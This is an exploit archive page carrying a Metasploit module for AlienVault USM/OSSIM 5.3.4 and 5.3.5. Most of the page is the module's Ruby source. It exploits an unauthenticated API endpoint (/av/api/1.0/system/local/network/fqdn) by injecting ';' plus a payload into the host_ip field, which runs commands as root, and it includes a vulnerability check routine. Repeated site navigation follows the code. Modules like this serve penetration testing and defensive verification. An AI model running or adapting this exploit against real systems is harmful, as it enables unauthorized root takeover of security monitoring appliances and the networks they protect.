AlienVault USM/OSSIM 5.3.4 / 5.3.5 Remote Command Execution

AlienVault USM/OSSIM 5.3.4 / 5.3.5 Remote Command Execution: Posted Apr 14, 2017; Authored by temp66, Peter Lapp | Site metasploit.com; This Metasploit module exploits an unauthenticated command injection in Alienvault USM/OSSIM versions 5.3.4 and 5.3.5. The vulnerability lies in an API function that does not check for authentication and then passes user input directly to a system call as root.; tags | exploit, root; SHA-256 | d72c139011d02b5dd53490824fea6a9d33d4ea93c69d1eaa4c8702f390b4d945; Download | Favorite | View

AlienVault USM/OSSIM 5.3.4 / 5.3.5 Remote Command Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'AlienVault USM/OSSIM API Command Execution',
      'Description'   => %q{
        This module exploits an unauthenticated command injection in Alienvault USM/OSSIM versions 5.3.4 and 5.3.5. The vulnerability lies in an API function that does not check for authentication and then passes user input directly to a system call as root. 
      },
      'Author'        =>
        [
          'Unknown', # Privately disclosed to Alienvault
          'Peter Lapp (lappsec@gmail.com)' # Metasploit module
        ],
      'License'       => MSF_LICENSE,
      'References'    =>
        [
          ['URL', 'https://www.alienvault.com/forums/discussion/8415/']
        ],
      'Privileged'     => false,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Compat'      => {
            'PayloadType' => 'cmd'
          }
        },
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'Targets'        =>
        [
          [ 'Automatic', { }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 5 2017'))
 
    register_options(
      [
        Opt::RPORT(40011)
      ], self.class)
  end
 
  def check
    res = send_request_cgi({
      'method' => 'POST',
      'uri'      => normalize_uri(target_uri.path, '/av/api/1.0/system/local/network/fqdn'),
      'vars_post' => {
        'host_ip'    => "127.0.0.1"
      },
          'headers'  => {
            'Accept' => "application/json"
      }
    })
 
    if res and res.code == 200 and res.body.include?('success')
      return Exploit::CheckCode::Vulnerable
    end
 
    return Exploit::CheckCode::Safe
  end
 
  def exploit
 
    print_status("Executing payload...")
 
    res = send_request_cgi({
      'method' => 'POST',
      'uri'      => normalize_uri(target_uri.path, '/av/api/1.0/system/local/network/fqdn'),
      'vars_post' => {
        'host_ip'    => ";#{payload.encoded}"
      },
          'headers'  => {
            'Accept' => "application/json"
      }
    })
  end
 
 
end

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

AlienVault USM/OSSIM 5.3.4 / 5.3.5 Remote Command Execution

AlienVault USM/OSSIM 5.3.4 / 5.3.5 Remote Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

AlienVault USM/OSSIM 5.3.4 / 5.3.5 Remote Command Execution

Share This

AlienVault USM/OSSIM 5.3.4 / 5.3.5 Remote Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems